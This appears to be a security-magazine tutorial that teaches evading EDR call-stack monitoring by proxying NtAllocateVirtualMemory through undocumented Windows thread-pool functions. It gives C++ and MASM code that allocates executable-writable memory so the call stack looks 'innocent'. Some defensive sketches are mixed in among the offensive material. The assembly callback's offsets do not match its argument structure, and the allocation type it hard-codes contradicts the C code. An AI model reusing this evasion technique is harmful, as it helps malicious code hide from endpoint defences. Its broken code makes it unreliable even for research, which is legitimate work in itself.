warning
This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.
WinAPI indirect calls
Why invent something new if such a technique as WinAPI Indirect Calls already exists? It has certain advantages, and it’s easy to implement and well-documented. Let me briefly remind you of its operating principle.
The essence of the Indirect Syscalls technique is that an NTAPI function is not called directly via ntdll.dll. Instead, special code emulates the call: the arguments are set up in registers and on the stack; the number of the system service used for this call is saved to eax; and then a jump is made to the address of the syscall instruction in ntdll.dll. The code looks something like this:
// The argument stack has already been formed; the WinAPI call from ntdll.dll is performed next
mov r10, rcx
mov eax, <syscall_number>
jmp <address_of_syscall_instruction_in_ntdll>
From the outside, it looks fine, and it worked until EDR products started using Event Tracing for Windows (ETW) to unwind the call stack of system calls. Although the Indirect Syscalls technique makes it possible to avoid detection at the user-mode level, it still leaves traces in the call stack. EDR can now unwind this stack, analyze it, and detect such anomalies.
Stack, frames, and EDR
To proceed further, a basic understanding of stack frames is required: how they are generated and how they work. A stack frame is a memory area on the stack allocated for each function call made by the program. It contains such data as function parameters, local variables, saved register values, and the return address. Below is a simple example of such code:
void func1() {
    int x = 10;
    func2(x);
    ...
}

void func2(int y) {
    int z = y + 5;
}
When func2() is called, the following frame is generated:
- RSP is the z variable;
- RBP is the base pointer of the previous frame;
- RBP + 8 is the pointer to the next instruction in func1() (return address); and
- RBP + 16 is a parameter of the func2 function.
In other words, stack frames are generated every time a function is called, and they contain plenty of useful information, including a pointer to the previous frame (that is, to the frame of the calling function). This is how EDR reconstructs the control flow if it detects suspicious behavior in the system. Needless to say, commonly used obfuscation methods for WinAPI calls won’t protect you from this detection technique; so, let’s try to forge a special frame to fool EDR.
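To make the idea of walking frames more concrete, here is a minimal sketch that follows the simplified frame layout described above (saved base pointer at RBP, return address at RBP + 8). It works on a simulated memory map and not on a real stack; the names Memory and walk_frames are hypothetical and exist only for this illustration. Keep in mind that real x64 Windows unwinders rely on unwind metadata stored in the module and not on an RBP chain, so this only illustrates the principle.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <vector>

// Simulated stack memory: address -> 8-byte value stored at that address.
using Memory = std::map<std::uint64_t, std::uint64_t>;

// Follows the chain of saved base pointers and collects return addresses.
// Assumed layout of every frame: [rbp] = caller's RBP, [rbp + 8] = return address.
std::vector<std::uint64_t> walk_frames(const Memory& mem, std::uint64_t rbp,
                                       std::size_t max_depth = 64) {
    assert(max_depth > 0);
    std::vector<std::uint64_t> return_addresses;
    // max_depth protects against a corrupted chain that loops forever.
    for (std::size_t depth = 0; depth < max_depth && rbp != 0; ++depth) {
        auto saved_rbp = mem.find(rbp);
        auto ret_addr = mem.find(rbp + 8);
        if (saved_rbp == mem.end() || ret_addr == mem.end()) {
            break; // the chain points outside the known memory: stop walking
        }
        return_addresses.push_back(ret_addr->second);
        rbp = saved_rbp->second; // step into the caller's frame
    }
    return return_addresses;
}
```

Each collected return address can then be mapped to the module that contains it, which is exactly the information a monitoring tool needs to judge whether a call chain looks legitimate.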
info
Event Tracing for Windows (ETW) is a technology embedded in Windows OS; it collects and records event-related data from various system components and applications. ETW provides powerful telemetry tools, including collection of information about the call stack, which is essential for diagnostics, performance monitoring, and security analysis.
How EDR monitors the stack
The thing is that EDR knows how the stack should look in any given situation, and if its structure deviates from the norm, an alert is triggered. Among other things, EDR checks:
- where the jump to syscall was made from. If the jump was made from a memory region that doesn’t belong to ntdll.dll (e.g. the heap or allocated memory), this is considered an anomaly;
- access rights to the memory region from where the jump was made. If the region has PAGE_EXECUTE_READWRITE rights, this might indicate an indirect call or shellcode; and
- where the execution flow will return after the system call is completed. If the return address points to user-allocated memory and not to a loaded module, this is also considered an anomaly.
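The checks listed above can be sketched as a small classifier over an already captured call stack. This is a simplified illustration from the defender's point of view, not the logic of any particular EDR product: the Frame structure, its fields, the finding strings, and the check_syscall_stack function are all hypothetical, and a real product would obtain this data from ETW and memory queries.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical, simplified description of one captured stack frame.
struct Frame {
    std::uint64_t address;
    std::string module; // empty if the address is not backed by a loaded module
    bool writable;      // the memory region is writable
    bool executable;    // the memory region is executable
};

// Returns a list of findings; an empty list means nothing suspicious.
// stack[0] is the frame that issued the system call.
std::vector<std::string> check_syscall_stack(const std::vector<Frame>& stack) {
    std::vector<std::string> findings;
    if (stack.empty()) {
        return findings;
    }
    // The syscall instruction itself is expected to live in ntdll.dll.
    if (stack[0].module != "ntdll.dll") {
        findings.push_back("syscall issued outside ntdll.dll");
    }
    // Every caller below it is expected to be backed by a module
    // and must not sit in a region that is both writable and executable.
    for (std::size_t i = 1; i < stack.size(); ++i) {
        if (stack[i].module.empty()) {
            findings.push_back("return address in unbacked memory");
        }
        if (stack[i].writable && stack[i].executable) {
            findings.push_back("frame in writable and executable region");
        }
    }
    return findings;
}
```

A stack consisting of ntdll.dll, kernel32.dll, and the program's own module produces no findings, while a stack with an unbacked executable region between ntdll.dll and the program is flagged.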
Now let’s see how the correct (from the EDR point of view) call stack structure looks when memory is allocated from a user application:
0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory
0x00007ffb`12345555 kernel32!VirtualAlloc
0x00007ffb`12345432 MyProgram!Main
The MyProgram application allocates memory from the main function using VirtualAlloc, which calls the NtAllocateVirtualMemory NTAPI function from ntdll.dll. But what happens if an NTAPI function is called manually (i.e. you form a stack and registers for the call)? In such a situation, the program makes an indirect call:
mov r10, rcx
// Number of NtAllocateVirtualMemory in the service table
mov eax, 0x18
// Making a syscall at a certain address in ntdll.dll
jmp 0x00007ffb`12345678
EDR captures the call stack:
0x00007ffb`12345678 ntdll!NtAllocateVirtualMemory
// Address in user memory (where you’ve generated arguments) from where the jump to the system call was performed inside ntdll.dll
0x000001a3`45678901 [RX Region]
0x00007ffb`12345432 MyProgram!Main
You can see that the system call itself is issued from ntdll.dll, but the frame right below it lies in user-allocated memory and not in a loaded module, which triggers an alert!
It turns out that indirect calls are not as difficult to detect as it might seem. Well, let’s find a solution!
Calling NTAPI without traces
One of my previous articles describes a code injection technique called PoolParty that uses the Windows Thread Pools mechanism. Now I am going to show how to call an NTAPI function using the same mechanism. It must be noted that this isn’t the only Windows mechanism that can be used to proxy NTAPI calls, but just a more or less researched one.
The TpAllocWork, TpPostWork, and TpReleaseWork functions are of special interest in this regard: they are used to manage tasks in Windows Thread Pools. These functions make it possible to create, start, and release tasks that are processed by the Windows Thread Pools, which facilitates parallel code execution. Needless to say, they are undocumented and reside in ntdll.dll. Let’s use them to call an NTAPI function bypassing stack monitoring. But first, let’s examine their prototypes.
The TpAllocWork function creates a new task that can be executed by the thread pool. When you create a task, you have to specify a callback function that will be executed when the thread pool starts processing this task.
NTSTATUS TpAllocWork(
    PTP_WORK* WorkReturn,
    PTP_WORK_CALLBACK WorkCallback,
    PVOID Context,
    PTP_CALLBACK_ENVIRON CallbackEnviron
);
Parameters:
- WorkReturn is a pointer to a variable that receives the created work object (PTP_WORK);
- WorkCallback is a pointer to the callback function that will be called to execute the task;
- Context is a pointer to the user context that is passed to the callback function; and
- CallbackEnviron is a pointer to the TP_CALLBACK_ENVIRON structure that configures the environment for the task. If the value of this parameter is nullptr, the default environment is used.
After execution, TpAllocWork returns an NTSTATUS code: in the case of success, the pointer to the work object of the thread pool is stored in WorkReturn; in case of an error, an error status is returned.
The next function is TpPostWork: it posts the created task to the thread pool queue for execution. This function activates the execution of the task created by TpAllocWork.
void TpPostWork(PTP_WORK Work);
Its only parameter, of type PTP_WORK, is a pointer to the work object of the thread pool that was created using TpAllocWork.
The last function is TpReleaseWork: it releases the task object. This function is required to release resources allocated to the task created using TpAllocWork. If the task is still queued or running, the resources are released only after the outstanding callback has completed.
void TpReleaseWork(PTP_WORK Work);
Similar to the previous function, TpReleaseWork has only one argument of type PTP_WORK.
An API call performed using these functions is formed as follows:
typedef NTSTATUS(NTAPI* TPALLOCWORK)(PTP_WORK* ptpWork, PTP_WORK_CALLBACK ptpCallback, PVOID arg, PTP_CALLBACK_ENVIRON CallbackEnv);
typedef VOID(NTAPI* TPPOSTWORK)(PTP_WORK);
typedef VOID(NTAPI* TPRELEASEWORK)(PTP_WORK);
...
VOID MakeCall(PTP_WORK_CALLBACK work_callback, PVOID args) {
    PTP_WORK ptpWork = NULL;
    // Create the work object, post it to the pool, and release it
    ((TPALLOCWORK)ptr_TpAllocWork)(&ptpWork, (PTP_WORK_CALLBACK)work_callback, args, NULL);
    ((TPPOSTWORK)ptr_TpPostWork)(ptpWork);
    ((TPRELEASEWORK)ptr_TpReleaseWork)(ptpWork);
    // Give the pool thread time to execute the callback
    WaitForSingleObject((HANDLE)-1, 0x1000);
}
Here, work_callback (of type PTP_WORK_CALLBACK) is a pointer to an assembly routine that will make the NTAPI call, while args (of type PVOID) points to the argument pack of the called function.
The argument pack is formed as a regular structure containing function parameters. The only exception is that the first argument in this structure is a pointer to NtAllocateVirtualMemory. In this particular case, it looks as follows:
// Argument structure
typedef struct _ZWALLOCATEVIRTUALMEMORY_ARG {
    // The first argument in the structure is a pointer to the NtAllocateVirtualMemory function.
    UINT_PTR pNtAllocateVirtualMemory;
    HANDLE ProcessHandle;
    PVOID* BaseAddress;
    ULONG_PTR ZeroBits;
    PSIZE_T RegionSize;
    ULONG AllocationType;
    ULONG Protect;
} ZWALLOCATEVIRTUALMEMORY_ARG, * PZWALLOCATEVIRTUALMEMORY_ARG;
...
PVOID NtAllocateVirtualMemory(HANDLE hProcess) {
    PVOID alloc_addr = NULL;
    SIZE_T alloc_size = 0x1000;
    ZWALLOCATEVIRTUALMEMORY_ARG AllocateVirtualMemory_Arg = { 0 };
    // Here you get a pointer to NtAllocateVirtualMemory
    AllocateVirtualMemory_Arg.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "NtAllocateVirtualMemory");
    AllocateVirtualMemory_Arg.ProcessHandle = hProcess;
    AllocateVirtualMemory_Arg.BaseAddress = &alloc_addr;
    AllocateVirtualMemory_Arg.ZeroBits = 0;
    AllocateVirtualMemory_Arg.RegionSize = &alloc_size;
    AllocateVirtualMemory_Arg.AllocationType = MEM_RESERVE;
    AllocateVirtualMemory_Arg.Protect = PAGE_EXECUTE_READWRITE;
    MakeCall((PTP_WORK_CALLBACK)NtAllocateVirtualMemoryCallback, &AllocateVirtualMemory_Arg);
    return alloc_addr;
}
The callback passed as work_callback is written in MASM; its purpose is to parse the arguments, set up the registers and the stack for NtAllocateVirtualMemory, and call the function. In x64, arguments are passed to the function as follows: the first four arguments are passed via the rcx, rdx, r8, and r9 registers; if the number of arguments is greater, the subsequent arguments are passed on the stack, at offsets relative to the rsp register.
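The following minimal sketch shows where the N-th integer or pointer argument is located at the moment a function is entered under the Microsoft x64 calling convention. The arg_location helper is hypothetical and written only for this illustration; it ignores floating-point arguments and structures passed by value. It relies on the fact that at function entry [rsp] holds the return address, followed by 32 bytes of shadow space reserved for the four register arguments.

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Returns the location of the n-th (1-based) integer or pointer argument
// at function entry under the Microsoft x64 calling convention.
std::string arg_location(int n) {
    assert(n >= 1);
    static const char* const regs[] = {"rcx", "rdx", "r8", "r9"};
    if (n <= 4) {
        return regs[n - 1];
    }
    // 8 bytes of return address + 32 bytes of shadow space,
    // then one 8-byte slot per additional argument.
    int offset = 8 + 32 + (n - 5) * 8;
    char buf[32];
    std::snprintf(buf, sizeof buf, "[rsp + %Xh]", offset);
    return buf;
}
```

For NtAllocateVirtualMemory, which takes six arguments, this gives rcx, rdx, r8, and r9 for the first four, and the stack slots at rsp + 28h and rsp + 30h for the fifth and the sixth.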
NtAllocateVirtualMemoryCallback proc
    mov rbx, rdx
    ; Get NTAPI address from the structure
    mov rax, [rbx]
    ; Receive all its remaining arguments
    mov rcx, [rbx + 8]
    mov rdx, [rbx + 10h]
    xor r8, r8
    mov r9, [rbx + 18h]
    mov r10, [rbx + 20h]
    mov [rsp + 30h], r10
    mov r10, 1000h
    mov [rsp + 28h], r10
    ; Call NtAllocateVirtualMemory
    jmp rax
NtAllocateVirtualMemoryCallback endp
Note that an assembly function can be called from C++ code by declaring it as extern "C" in one of the headers.
extern "C" VOID CALLBACK NtAllocateVirtualMemoryCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);
After that, you can call NtAllocateVirtualMemory(), and the stack will look absolutely ‘innocent’ because the function call will be performed by the Windows Thread Pools mechanism.

Conclusions
Congrats! Now you know what stack unwinding is, how it helps to detect the execution of malicious code, and how this detection mechanism can be fooled. Importantly, Windows itself helps you to avoid detection. Can this technique be considered a silver bullet? Of course not! As soon as EDR systems start monitoring callbacks in functions that are of interest to them, this secret will be exposed. But, as always, the battle between the shield and the sword continues!